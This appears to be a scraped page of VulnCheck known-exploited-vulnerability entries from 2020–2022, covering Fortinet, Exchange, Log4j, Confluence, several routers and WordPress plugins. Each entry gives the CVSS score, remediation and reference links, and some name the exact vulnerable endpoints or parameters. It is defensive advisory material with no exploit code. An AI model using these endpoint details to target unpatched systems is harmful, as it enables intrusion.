Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-21&host_type=src&vulnerability=cve-2022-36553; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-02-12&host_type=src&vulnerability=cve-2022-36553; https://dashboard.shadowserver.org/statistics/honeypot/vuln
VulnCheck
Fortinet Multiple Products Authentication Bypass Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-40684 [CRITICAL] CWE-288 Fortinet Multiple Products Authentication Bypass Vulnerability
Fortinet Multiple Products Authentication Bypass Vulnerability
Fortinet FortiOS, FortiProxy, and FortiSwitchManager contain an authentication bypass vulnerability that could allow an unauthenticated attacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.
Affected: Fortinet Multiple Products
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.fortiguard.com/psirt/FG-IR-22-377; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2022-40684; https://blog.cyble.com/2022/11/24/multiple-organisations-compromised-by-critical-authentication-bypass-vulnerability-in-fortinet-pro
VulnCheck
HP edgeline_infrastructure_manager Missing Authentication for Critical Function
vulncheck·2021·CVSS 9.8
CVE-2021-29203 [CRITICAL] HP edgeline_infrastructure_manager Missing Authentication for Critical Function
HP edgeline_infrastructure_manager Missing Authentication for Critical Function
A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
Affected: HP edgeline_infrastructure_manager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References:
VulnCheck
wptaskforce wpcargo_track_\&_trace Improper Control of Generation of Code ('Code Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-25003 [CRITICAL] wptaskforce wpcargo_track_\&_trace Improper Control of Generation of Code ('Code Injection')
wptaskforce wpcargo_track_\&_trace Improper Control of Generation of Code ('Code Injection')
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE
Affected: wptaskforce wpcargo_track_\&_trace
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-30&host_type=src&vulnerability=cve-2021-25003; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-03&host_type=src&vulnerability=cve-2021-25003; https://dashboard.shadowserver.o
VulnCheck
Microsoft Exchange Server Remote Code Execution Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-28481 [CRITICAL] Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server Remote Code Execution Vulnerability
Affected: Microsoft Exchange Server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-june-2024; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/scanning-for-credentials-and-botpoke-changes-ips-again; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-
VulnCheck
Laravel Ignition File Upload Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-3129 [CRITICAL] Laravel Ignition File Upload Vulnerability
Laravel Ignition File Upload Vulnerability
Laravel Ignition contains a file upload vulnerability that allows unauthenticated remote attackers to execute malicious code due to insecure usage of file_get_contents() and file_put_contents().
Affected: Laravel Ignition
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/; https://blogs.juniper.net/en-us/threat-research/sysrv-botnet-expands-and-gains-persistence; https://www.bleepingcomputer.com/news/security/new-cryptomining-malware-builds-an-army-of-windows-linux-bots/; https://blog.talosintellige
VulnCheck
maianscriptworld maian_cart Missing Authorization
vulncheck·2021·CVSS 9.8
CVE-2021-32172 [CRITICAL] maianscriptworld maian_cart Missing Authorization
maianscriptworld maian_cart Missing Authorization
Maian Cart v3.8 contains a preauthorization remote code execution (RCE) exploit via a broken access control issue in the Elfinder plugin.
Affected: maianscriptworld maian_cart
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
Samsung Mobile Devices Improper Access Control Vulnerability
vulncheck·2021·CVSS 4.4
CVE-2021-25369 [MEDIUM] CWE-200 Samsung Mobile Devices Improper Access Control Vulnerability
Samsung Mobile Devices Improper Access Control Vulnerability
Samsung mobile devices using Mali GPU contains an improper access control vulnerability in sec_log file. Exploitation of the vulnerability exposes sensitive kernel information to the userspace. This vulnerability was chained with CVE-2021-25337 and CVE-2021-25370.
Affected: Samsung Mobile Devices
Required Action: Apply updates per vendor instructions.
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; http
VulnCheck
cyberoamworks netgenie_c0101b1-20141120-ng11vo_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2021·CVSS 6.1
CVE-2021-38702 [MEDIUM] cyberoamworks netgenie_c0101b1-20141120-ng11vo_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
cyberoamworks netgenie_c0101b1-20141120-ng11vo_firmware Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow tweb/ft.php?u=[XSS] attacks.
Affected: cyberoamworks netgenie_c0101b1-20141120-ng11vo_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
Microsoft Exchange Server Remote Code Execution Vulnerability
vulncheck·2021·CVSS 7.8
CVE-2021-27065 [HIGH] CWE-39 Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution. This vulnerability is part of the ProxyLogon exploit chain.
Affected: Microsoft Exchange Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/alerts/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers; https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/; https://us-cert.cisa
VulnCheck
Atlassian Jira Server and Data Center Path Traversal Vulnerability
vulncheck·2021·CVSS 5.3
CVE-2021-26086 [MEDIUM] CWE-22 Atlassian Jira Server and Data Center Path Traversal Vulnerability
Atlassian Jira Server and Data Center Path Traversal Vulnerability
Atlassian Jira Server and Data Center contain a path traversal vulnerability that allows a remote attacker to read particular files in the /WEB-INF/web.xml endpoint.
Affected: Atlassian Jira Server and Data Center
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_type=src&vulnerability=cve-2021-26086; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-22&host_type=src&vulnerability=cve-2021-26086; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-23&host_type=
VulnCheck
Atlassian Confluence Server and Data Center Object-Graph Navigation Language (OGNL) Injection Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-26084 [CRITICAL] CWE-917 Atlassian Confluence Server and Data Center Object-Graph Navigation Language (OGNL) Injection Vulnerability
Atlassian Confluence Server and Data Center Object-Graph Navigation Language (OGNL) Injection Vulnerability
Atlassian Confluence Server and Data Server contain an Object-Graph Navigation Language (OGNL) injection vulnerability that may allow an unauthenticated attacker to execute code.
Affected: Atlassian Confluence Server and Data Center
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.lacework.com/blog/muhstik-takes-aim-at-confluence-cve-2021-26084/; https://cybersecurityworks.com/blog/vulnerabilities/cve-2021-26084-patch-the-confluence-servers-now.html; https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/; https://www.lacework.co
VulnCheck
dragonfly_project dragonfly Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-33564 [CRITICAL] dragonfly_project dragonfly Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
dragonfly_project dragonfly Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')
An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
Affected: dragonfly_project dragonfly
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-29&host_type=src&vulnerability=cve-202
VulnCheck
Microsoft Exchange Server Remote Code Execution Vulnerability
vulncheck·2021·CVSS 9.1
CVE-2021-34473 [CRITICAL] CWE-918 Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution.
Affected: Microsoft Exchange Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cybereason.com/blog/threat-alert-microsoft-exchange-proxyshell-exploits-and-lockfile-ransomware; https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html; https://www.securin.io/microsoft-exchange-proxyshell-and-windows-petitpotam-vulnerabilities-chained-in-new-attack/; https://threatpost.com/apt-chamelgang-targets-russian-energy-aviation/175272/; https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-ac
VulnCheck
raspap raspap Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-33357 [CRITICAL] raspap raspap Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
raspap raspap Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A vulnerability exists in RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands.
Affected: raspap raspap
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attacks-trends-august-october-2021/; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-33357; https://dash
VulnCheck
advantech r-seenet Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2021·CVSS 6.1
CVE-2021-21801 [MEDIUM] advantech r-seenet Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
advantech r-seenet Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
This vulnerability is present in device_graph_page.php script, which is a part of the Advantech R-SeeNet web applications. A specially crafted URL by an attacker and visited by a victim can lead to arbitrary JavaScript code execution.
Affected: advantech r-seenet
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scannin
VulnCheck
Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-40539 [CRITICAL] CWE-55 Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability
Zoho ManageEngine ADSelfService Plus Authentication Bypass Vulnerability
Zoho ManageEngine ADSelfService Plus contains an authentication bypass vulnerability affecting the REST API URLs which allow for remote code execution.
Affected: Zoho ManageEngine
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/alerts/2021/09/16/fbi-cisa-cgcyber-advisory-apt-exploitation-manageengine-adselfservice; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2021-40539; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/; https://www.microsoft.com/en-us/security/blog/2021/11/08/threat-actor-dev-03
VulnCheck
Apache Log4j2 Remote Code Execution Vulnerability
vulncheck·2021·CVSS 10.0
CVE-2021-44228 [CRITICAL] CWE-20 Apache Log4j2 Remote Code Execution Vulnerability
Apache Log4j2 Remote Code Execution Vulnerability
Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.
Affected: Apache Log4j2
Required Action: For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/cybersecurity-advisories/aa21-336a; https://api.vulncheck.com/v3/index/sans-dshield?cve=
VulnCheck
beyondtrust appliance_base_software Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2021·CVSS 6.1
CVE-2021-31589 [MEDIUM] beyondtrust appliance_base_software Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
beyondtrust appliance_base_software Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
A cross-site scripting (XSS) vulnerability has been reported and confirmed for BeyondTrust Secure Remote Access Base Software version 6.0.1 and older, which allows the injection of unauthenticated, specially-crafted web requests without proper sanitization.
Affected: beyondtrust appliance_base_software
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.co
VulnCheck
Metabase GeoJSON API Local File Inclusion Vulnerability
vulncheck·2021·CVSS 10.0
CVE-2021-41277 [CRITICAL] CWE-200 Metabase GeoJSON API Local File Inclusion Vulnerability
Metabase GeoJSON API Local File Inclusion Vulnerability
Metabase contains a local file inclusion vulnerability in the custom map support in the API to read GeoJSON formatted data.
Affected: Metabase Metabase
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-security-trends-cross-site-scripting/; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2021-41277; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2021-41277; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&
VulnCheck
VMware vCenter Server Improper Input Validation Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-21985 [CRITICAL] CWE-20 VMware vCenter Server Improper Input Validation Vulnerability
VMware vCenter Server Improper Input Validation Vulnerability
VMware vSphere Client contains an improper input validation vulnerability in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server, which allows for remote code execution.
Affected: VMware vCenter Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/alerts/2021/06/04/unpatched-vmware-vcenter-software; https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.tenable.com/blog/contileaks-chats-reveal-over-30-vulnerabilities-used-by-conti-ransomware-affiliates; https://cybersecurityworks.com/
VulnCheck
System Information Library for Node.JS Command Injection
vulncheck·2021·CVSS 7.1
CVE-2021-21315 [HIGH] CWE-78 System Information Library for Node.JS Command Injection
System Information Library for Node.JS Command Injection
In this vulnerability, an attacker can send a malicious payload that will exploit the name parameter. After successful exploitation, attackers can execute remote.
Affected: Npm package System Information Library for Node.JS
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-february-april-2021/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_type=src&vulnerability=cve-2021-21315; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-17&host_type=src&vulnerability=cve-2021-21315; htt
VulnCheck
std42 elfinder Unrestricted Upload of File with Dangerous Type
vulncheck·2021·CVSS 8.1
CVE-2021-23394 [HIGH] std42 elfinder Unrestricted Upload of File with Dangerous Type
std42 elfinder Unrestricted Upload of File with Dangerous Type
The package studio-42/elfinder before 2.1.58 are vulnerable to Remote Code Execution (RCE) via execution of PHP code in a .phar file. NOTE: This only applies if the server parses .phar files as PHP.
Affected: std42 elfinder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://app.crowdsec.net/cti/cve-explorer/CVE-2021-23394
VulnCheck
NETGEAR rax43 Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2021·CVSS 8.0
CVE-2021-20167 [HIGH] NETGEAR rax43 Improper Neutralization of Special Elements used in a Command ('Command Injection')
NETGEAR rax43 Improper Neutralization of Special Elements used in a Command ('Command Injection')
Netgear RAX43 version 1.0.3.96 contains a command injection vulnerability. The readycloud cgi application is vulnerable to command injection in the name parameter.
Affected: NETGEAR rax43
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-fo
VulnCheck
Microsoft Exchange Server Remote Code Execution Vulnerability
vulncheck·2021·CVSS 9.1
CVE-2021-26855 [CRITICAL] CWE-918 Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server Remote Code Execution Vulnerability
Microsoft Exchange Server contains an unspecified vulnerability that allows for remote code execution. This vulnerability is part of the ProxyLogon exploit chain.
Affected: Microsoft Exchange Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/alerts/2021/03/02/microsoft-releases-out-band-security-updates-exchange-server; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers; https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/; https://us-cert.cisa
VulnCheck
binatoneglobal halo\+_camera_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2021·CVSS 8.8
CVE-2021-3577 [HIGH] binatoneglobal halo\+_camera_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
binatoneglobal halo\+_camera_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
An unauthenticated remote code execution vulnerability was reported in some Motorola-branded Binatone Hubble Cameras that could allow an attacker on the same network unauthorized access to the device.
Affected: binatoneglobal halo\+_camera_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2021-3577; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-23&host_type=src&vu
VulnCheck
podlove podlove_podcast_publisher Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
vulncheck·2021·CVSS 9.8
CVE-2021-24666 [CRITICAL] podlove podlove_podcast_publisher Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
podlove podlove_podcast_publisher Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
The Podlove Podcast Publisher WordPress plugin before 3.5.6 contains a 'Social & Donations' module (not activated by default), which adds the rest route '/services/contributor/(?P[\d]+), takes an 'id' and 'category' parameters as arguments. Both parameters can be used for the SQLi.
Affected: podlove podlove_podcast_publisher
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
VulnCheck
gpononu 1ge_router_wifi_onu_v2801rw_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2020·CVSS 7.2
CVE-2020-8958 [HIGH] gpononu 1ge_router_wifi_onu_v2801rw_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
gpononu 1ge_router_wifi_onu_v2801rw_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Guangzhou 1GE ONU V2801RW 1.9.1-181203 through 2.9.0-181024 and V2804RGW 1.9.1-181203 through 2.9.0-181024 devices allow remote attackers to execute arbitrary OS commands via shell metacharacters in the boaform/admin/formPing Dest IP Address field.
Affected: gpononu 1ge_router_wifi_onu_v2801rw_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits; htt
VulnCheck
Oria GridX 1.3 tests/support/stores/test_grid_filter.php Remote Code Execution
vulncheck·2020·CVSS 9.8
CVE-2020-19625 [CRITICAL] Oria GridX 1.3 tests/support/stores/test_grid_filter.php Remote Code Execution
Oria GridX 1.3 tests/support/stores/test_grid_filter.php Remote Code Execution
Remote Code Execution Vulnerability in tests/support/stores/test_grid_filter.php in oria gridx 1.3, allows remote attackers to execute arbitrary code, via crafted value to the $query parameter.
Affected: gridx_project gridx
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-27&host_type=src&vulnerability=cve-2020-19625; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2020-19625; https://dashboard.shadowserver.org/statistics/
VulnCheck
D-Link DCS-2530L and DCS-2670L Devices Unspecified Vulnerability
vulncheck·2020·CVSS 7.5
CVE-2020-25078 [HIGH] D-Link DCS-2530L and DCS-2670L Devices Unspecified Vulnerability
D-Link DCS-2530L and DCS-2670L Devices Unspecified Vulnerability
D-Link DCS-2530L and DCS-2670L devices contains an unspecified vulnerability that could allow for remote administrator password disclosure. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.
Affected: D-Link DCS-2530L and DCS-2670L Devices
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-february-april-2021/; https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/th
VulnCheck
netsweeper netsweeper Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2020·CVSS 9.8
CVE-2020-13167 [CRITICAL] netsweeper netsweeper Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
netsweeper netsweeper Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
Affected: netsweeper netsweeper
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-11&host_type=src&vulnerability=cve-2020-13167; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_ty
VulnCheck
vBulletin PHP Module Remote Code Execution Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-17496 [CRITICAL] CWE-74 vBulletin PHP Module Remote Code Execution Vulnerability
vBulletin PHP Module Remote Code Execution Vulnerability
The PHP module within vBulletin contains an unspecified vulnerability that allows for remote code execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. This CVE ID resolves an incomplete patch for CVE-2019-16759.
Affected: vBulletin vBulletin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://blogs.juniper.net/en-us/threat-research/everything-but-the-kitchen-sink-more-attacks-from-the-gitpaste-12-worm; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-18&host_
VulnCheck
Multiple DrayTek Vigor Routers Web Management Page Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-8515 [CRITICAL] CWE-78 Multiple DrayTek Vigor Routers Web Management Page Vulnerability
Multiple DrayTek Vigor Routers Web Management Page Vulnerability
DrayTek Vigor3900, Vigor2960, and Vigor300B routers contain an unspecified vulnerability that allows for remote code execution.
Affected: DrayTek Vigor Routers
Required Action: Apply updates per vendor instructions.
Exploitation References: https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/; https://www.radware.com/security/ddos-threats-attacks/threat-advisories-attack-reports/hoaxcalls-evolution/; https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/; https://blog.radware.com/security/botnets/2020/05/ghosting-bots-the-story-of-hoaxcalls-failures/; https://blog.netlab.360.com/ddos-botnet-moobot-en/; https://unit42.paloaltonetworks.com/iot-vulnerabilities-mirai-pay
VulnCheck
WordPress File Manager Plugin Remote Code Execution Vulnerability
vulncheck·2020·CVSS 10.0
CVE-2020-25213 [CRITICAL] CWE-434 WordPress File Manager Plugin Remote Code Execution Vulnerability
WordPress File Manager Plugin Remote Code Execution Vulnerability
WordPress File Manager plugin contains a remote code execution vulnerability that allows unauthenticated users to execute PHP code and upload malicious files on a target site.
Affected: WordPress File Manager Plugin
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2020-25213; https://unit42.paloaltonetworks.com/cve-2020-25213/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2020-25213; https://dashboard.shadowserver.org/statis
VulnCheck
avertx hd838_firmware Observable Discrepancy
vulncheck·2020·CVSS 5.3
CVE-2020-11625 [MEDIUM] avertx hd838_firmware Observable Discrepancy
avertx hd838_firmware Observable Discrepancy
An issue was discovered in AvertX Auto focus Night Vision HD Indoor/Outdoor IP Dome Camera HD838 and Night Vision HD Indoor/Outdoor Mini IP Bullet Camera HD438. Failed web UI login attempts elicit different responses depending on whether a user account exists. Because the responses indicate whether a submitted username is valid or not, they make it easier to identify legitimate usernames. If a login request is sent to ISAPI/Security/sessionLogin/capabilities using a username that exists, it will return the value of the salt given to that username, even if the password is incorrect. However, if a login request is sent using a username that is not present in the database, it will return an empty salt value. This allows attackers to enumerate legi
VulnCheck
WSO2 api_manager Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
vulncheck·2020·CVSS 6.1
CVE-2020-17453 [MEDIUM] WSO2 api_manager Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
WSO2 api_manager Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
